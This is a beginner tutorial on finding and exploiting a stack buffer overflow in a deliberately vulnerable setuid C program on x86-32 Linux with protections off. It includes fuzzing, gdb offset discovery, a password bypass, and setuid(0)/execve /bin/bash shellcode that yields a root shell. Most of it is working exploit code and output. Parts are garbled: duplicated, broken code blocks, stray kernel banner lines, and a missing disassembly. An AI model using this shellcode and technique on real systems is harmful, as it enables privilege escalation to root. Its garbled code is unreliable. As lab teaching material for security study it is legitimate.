Plain Buffer Overflow [Fully Explained]
17:29
This is the start of a series of tutorials exploring how to detect and exploit stackbased vulnerabilities on x86-32 Linux systems. As this is the first it will involve detecting and exploiting a buffer overflow on a system with no protections in place. Modern protections will be explored in future tutorials but its important to understand the basics before trying to take on the more complex situations.
A buffer overflow happens when a programmer has not done sufficient bounds checking while or before copying the contents of one buffer into another. A buffer is normally a variable array (stack) or memory allocated using a dynamic memory allocation function (heap). We will be concentrating on stack based (variable array) buffer overflows at first as they are much easier to understand for beginners.
All of the code in this tutorial was written by the author.
The Vulnerable App:
Below is the source code of the vulnerable application that we will be attacking. It is written in C.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define PASS "topsecretpassword"
#define SFILE "secret.txt"
int checkpass(char *p);
void printfile();
int main(int argc, char **argv)
{
int r;
if (argc < 2) {
printf("Usage: ");
printf(argv[0]);
printf(" <password>\n");
exit(1);
}
r = checkpass(argv[1]);
if (r != 0) {
printf("Wrong password: ");
printf(argv[1]);
printf("\n");
exit(1);
}
printfile();
}
int checkpass(char *a)
{
char p[512];
int r;
strncpy(p, a, strlen(a)+1);
r = strcmp(p, PASS);
return r;
}
void printfile()
{
FILE *f;
int c;
f = fopen(SFILE, "r");
if (f) {
while ((c = getc(f)) != EOF)
putchar(c);
fclose(f);
} else {
printf("Error opening file: " SFILE "\n");
exit(1);
}
}
The Fix:
The code in the above application that is vulnerable to a stack based buffer overflow is on line 36 (
strncpy(p, a, strlen(a)+1);
). Here the programmer has wrongly calculated the maximum number of bytes that can be copied into the buffer p
as strlen(a)+1
, this calculation is in fact based on the length of the input provided by the user and is controled by the user. To fix this vulnerability, this line should be changed to strncpy(p, a, sizeof(p)-1);
or strncpy(p, a, 511);
, we minus the 1 byte to leave space for the terminating null character ‘\0
’. For more information about strncpy see man strncpy.Setting Up The Environment:
This is how to setup the environment in full on a Debian based system:
root@dev:~# adduser testuser
Adding user `testuser' ...
Adding new group `testuser' (1001) ...
Adding new user `testuser' (1001) with group `testuser' ...
Creating home directory `/home/testuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for testuser
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
root@dev:~# ls
app.c
root@dev:~# gcc -z execstack -fno-stack-protector -o app app.c
root@dev:~# cp app /home/testuser/
root@dev:~# cat /proc/sys/kernel/randomize_va_space
2
root@dev:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@dev:~# cat /proc/sys/kernel/randomize_va_space
0
root@dev:~# cd /home/testuser/
root@dev:/home/testuser# ls -l app
-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app
root@dev:/home/testuser# chmod u+s app
root@dev:/home/testuser# ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
root@dev:/home/testuser# echo 'This is a top secret file!
> Only people with the password should be able to view this file!' > secret.txt
root@dev:/home/testuser# ls -l secret.txt
-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt
root@dev:/home/testuser# chmod 600 secret.txt
root@dev:/home/testuser# ls -l secret.txt
-rw------- 1 root root 91 May 9 13:40 secret.txt
root@dev:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
root@dev:/home/testuser# su - testuser
testuser@dev:~$ ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
testuser@dev:~$ ls -l secret.txt
-rw------- 1 root root 91 May 9 13:40 secret.txt
testuser@dev:~$ cat secret.txt
cat: secret.txt: Permission denied
So our environment is setup and ready for exploit development. Firstly a testuser is added to run the application as, then on line 20 the application is compiled with stack protections removed. On line 24 ASLR is disabled and on line 30 the application has the setuid bit set so that when run the application can run with root privileges (which is required to read the file created on lines 33 and 34). Lastly confirmation that the file is not readable by the user that runs the application is on lines 48 and 49.
Testing App and Finding Vulnerability:
First we need to use the application to figure out its inputs and see how the application acts normally:
testuser@dev:~$ ./app
Usage: ./app <password>
testuser@dev:~$ ./app test
Wrong password: test
testuser@dev:~$ echo $?
1
As we can see, when we enter the wrong password the applications exit code is
1
, let’s try fuzzing this input to look for a buffer overflow, here is a simple python script that can do that:
#!/usr/bin/env python
import os
from subprocess import Popen, PIPE
count=0 # store the number when we cause a crash
for i in range(5000): # loop through the numbers from 0 to 5000
# and use i as the incrementor
# execute the file ./app with the argument "A"*i so we keep
# increasing the number of A's by 1
process = Popen(["./app", "A"*i], stdin=PIPE, stdout=PIPE)
(output, err) = process.communicate()
exit_code = process.wait() # wait for the programs exit code
if exit_code != 1: # if its not = 1
count = i # set the count to i
break # and break out of the loop
print count # print the number of A's it took to crash it
Running the python script gives us:
testuser@dev:~$ python app-fuzz.py
524
Exploiting The App:
So the python script crashed the application by inserting 524 A’s as its input. Just because we crashed the application it doesn’t mean we took control of the applications execution, so we now need to figure out how many bytes we need to send before we hijack execution (one character is a single byte, so 524 A’s is 524 bytes).
We will use
gdb
to do this. The hex for A
is 41
, you can figure this out using the ascii man page (man ascii), so what we are looking for is when the application crashes it should be trying to run 41414141
(as this is a 32 bit system, each instruction is 32 bits long or 4 bytes).
testuser@dev:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) r $(python -c 'print "A" * 524')
Starting program: /home/testuser/app $(python -c 'print "A" * 524')
Program received signal SIGSEGV, Segmentation fault.
0xb7ed9d03 in strchrnul () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
(gdb) r $(python -c 'print "A" * 528')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 528')
Program received signal SIGSEGV, Segmentation fault.
0xbffff970 in ?? ()
(gdb) r $(python -c 'print "A" * 532')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 532')
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
We increase the number of bytes by 4 each time because we are on a 32 bit system. So 528 bytes and then we hijack execution, you can see this as when the application crashes the instruction that the application is trying to run is
0x41414141
(on line 21) which is just AAAA
.
I’m going to show you 2 ways you can exploit this, the first is very easy and just involves changing the flow of the application to bypass the password authentication. First we need to find the address of the code that is run after the check, again we’ll use
gdb
for this:
I use the
-q
option to gdb
to supress the informational message that it normally splits out on started, I then set the disassembly flavor to intel
format because gdb
defaults to AT&T format and I prefer intel.
The call to
printfile
on line 41 looks like a good choice to jump to and as we can see it is at address 0x0804869b
. All we need to do is put this address in, in reverse due to little endian, after 528 bytes, heres how:
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x9b\x86\x04\x08"')
This is a top secret file!
Only people with the password should be able to view this file!
Segmentation fault
We still get a segmentation fault but it outputs the contents of the file meaning we’ve circumvented the password protection.
Developing Shellcode/ Improving Exploitation:
Now I’m going to show you how to use this to run your own code as root. First we need some code to run. I’ve written a quick assembly application in IA32 format which just runs the execve system callwith /bin/bash as its argument (for more information on execve itself see man execve):
; run /bin/bash
global _start
section .text
_start:
jmp short Call_shellcode ; jump to where our string is
shellcode:
pop ebx ; pop the address of our string into ebx
; which is the first argument to execve
xor eax, eax ; zero out the eax register
mov [ebx +9], al ; put a 0 where the A is to null
; terminate the /bin/bash string
mov al, 0xb ; put the sys call number 11 into eax
mov [ebx +10], ebx ; put a pointer to the beginning
; of the string where the BBBB is
xor ecx, ecx ; zero out the ecx register
mov [ebx +14], ecx ; replace the CCCC with 0000
lea ecx, [ebx +10] ; load the address that used to
; point to BBBB into ecx the second
; argument to execve
lea edx, [ebx +14] ; load the address that used to
; point to CCCC into edx the third
; argument to execve
int 0x80 ; execute the syscall execve
Call_shellcode:
call shellcode ; call the start of the actual application
shell: db "/bin/bashABBBBCCCC" ; our string of
; arguments to execve
A system call works by loading the sys call number into the eax register, putting the 1st, 2nd and 3rd arguments into the ebx, ecx, edx registers respectively; and then running
int 0x80
to execute the system call. To find the sys call number do this:
testuser@dev:~$ grep execve /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_execve 11
This means execve is 11 or 0xb in hex.
In this shellcode I’m using the jmp-call-pop technique to get the address of the string and the list of arguments (When you do a call instruction, the address of the next instruction is pushed onto the stack), this makes the code position independent. So we now need to extract this shellcode:
testuser@dev:~$ nasm -f elf32 -o shell.o shell.nasm
testuser@dev:~$ ld -o shell shell.o
testuser@dev:~$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
x43\x43\x43\x43"
We have shellcode now but we should test it to make sure it works, the following C application can do that:
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b"
"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e"
"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
I’ve split it up onto multiple lines here for readability. Compiling it and running it:
testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c
testuser@dev:~$ ./shellcode
Shellcode Length: 49
testuser@dev:/home/testuser$
It worked, the application
shellcode
just sets the return value of the main function to the address of the beginning of our shellcode which run’s it because you can’t just run it manually:
testuser@dev:~$ ./shell
Segmentation fault
Now we need to figure out a way to put our shellcode in memory and find its address to hijack execution of our vulnerable application with. We can put it in an environment varable and use getenvto get its address, here is how we put it into an environment variable:
testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')
Here is another C application that we can use to get the address of an environment variable in the memory of another application:
Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64
Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC #include <stdio.h>
#include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { char *ptr; if(argc < 3) { printf("Usage: %s <environment variable> <target program name>\n", argv[0]); exit(0); } ptr = getenv(argv[1]); /* get env var location */ ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */ printf("%s will be at %p\n", argv[1], ptr); }
#include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { char *ptr; if(argc < 3) { printf("Usage: %s <environment variable> <target program name>\n", argv[0]); exit(0); } ptr = getenv(argv[1]); /* get env var location */ ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */ printf("%s will be at %p\n", argv[1], ptr); }
We compile this application and run it with the relevent arguments:
testuser@dev:~$ gcc -o getenvaddr getenvaddr.c
testuser@dev:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff774
Great! Nearly there, we’ve got the address of our shellcode now to use it. We will hijack the execution flow as we did before but this time we will point to the address of our environment variable:
Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64
Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x74\xf7\xff\xbf"')
bash-4.2$ whoami testuser bash-4.2$ cat secret.txt cat: secret.txt: Permission denied
bash-4.2$ whoami testuser bash-4.2$ cat secret.txt cat: secret.txt: Permission denied
Damn! So it didn’t work. It must be dropping privileges, no need to worry, but we now to to change our shellcode to run the setuid system call before executing execve and set the uid to 0 (or root) (for more information on setuid see man setuid). First we need to find out the sys call number:
testuser@dev:~$ grep setuid /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_setuid 23
#define __NR_setuid32 213
The sys call number is 23 or 0x17 in hex, our modified shellcode is:
; run /bin/bash
global _start
section .text
_start:
jmp short Call_shellcode ; jump to where our string is
shellcode:
xor eax, eax ; zero out eax
mov al, 0x17 ; put 23 into eax to setuid
xor ebx, ebx ; zero out ebx
int 0x80 ; make the syscall setuid
mov eax, ebx ; zero out eax
pop ebx ; pop the address of our string into ebx
; which is the first argument to execve
mov [ebx +9], al ; put a 0 where the A is to null
; terminate the /bin/bash string
mov al, 0xb ; put the sys call number 11 into eax
mov [ebx +10], ebx ; put a pointer to the beginning
; of the string where the BBBB is
xor ecx, ecx ; zero out the ecx register
mov [ebx +14], ecx ; replace the CCCC with 0000
lea ecx, [ebx +10] ; load the address that used to
; point to BBBB into ecx the second
; argument to execve
lea edx, [ebx +14] ; load the address that used to
; point to CCCC into edx the third
; argument to execve
int 0x80 ; execute the syscall execve
Call_shellcode:
call shellcode ; call the start of the actual application
shell: db "/bin/bashABBBBCCCC" ; our string of
; arguments to execve
This is the same as before except I added a call to setuid before it starts setting up the call to execve. Let’s first make sure it works:
testuser@dev:~$ nasm -f elf32 -o shell2.o shell2.nasm
testuser@dev:~$ ld -o shell2 shell2.o
testuser@dev:~$ objdump -d ./shell2|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
testuser@dev:~$ cat shellcode.c
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c
testuser@dev:~$ ./shellcode
Shellcode Length: 57
testuser@dev:/home/testuser$
That seems to work, let’s test it out:
testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')
testuser@dev:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff76c
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x6c\xf7\xff\xbf"')
root@dev:/home/testuser# whoami
root
root@dev:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
PWNED!!! :-D
Conclusion:
t’s very important to understand that when you are developing exploits you are always going to run into problems, that is why I left the bit in here where I did n’t get root access. You will fail over and over again but if you continue trying you will find a way to hack it in the end.
This was one of the simplest examples possible but before continuing it is important that you are able to do this. Don’t worry if you don’t understand how the application execution was hijacked or how the stack works, I will explain all of that in later tutorials when it is absolutely necessary, this tutorial is already long enough without going into more depth.
I hope you enjoyed reading this as much as I enjoyed writing it.
Happy Hacking :–)
0 comments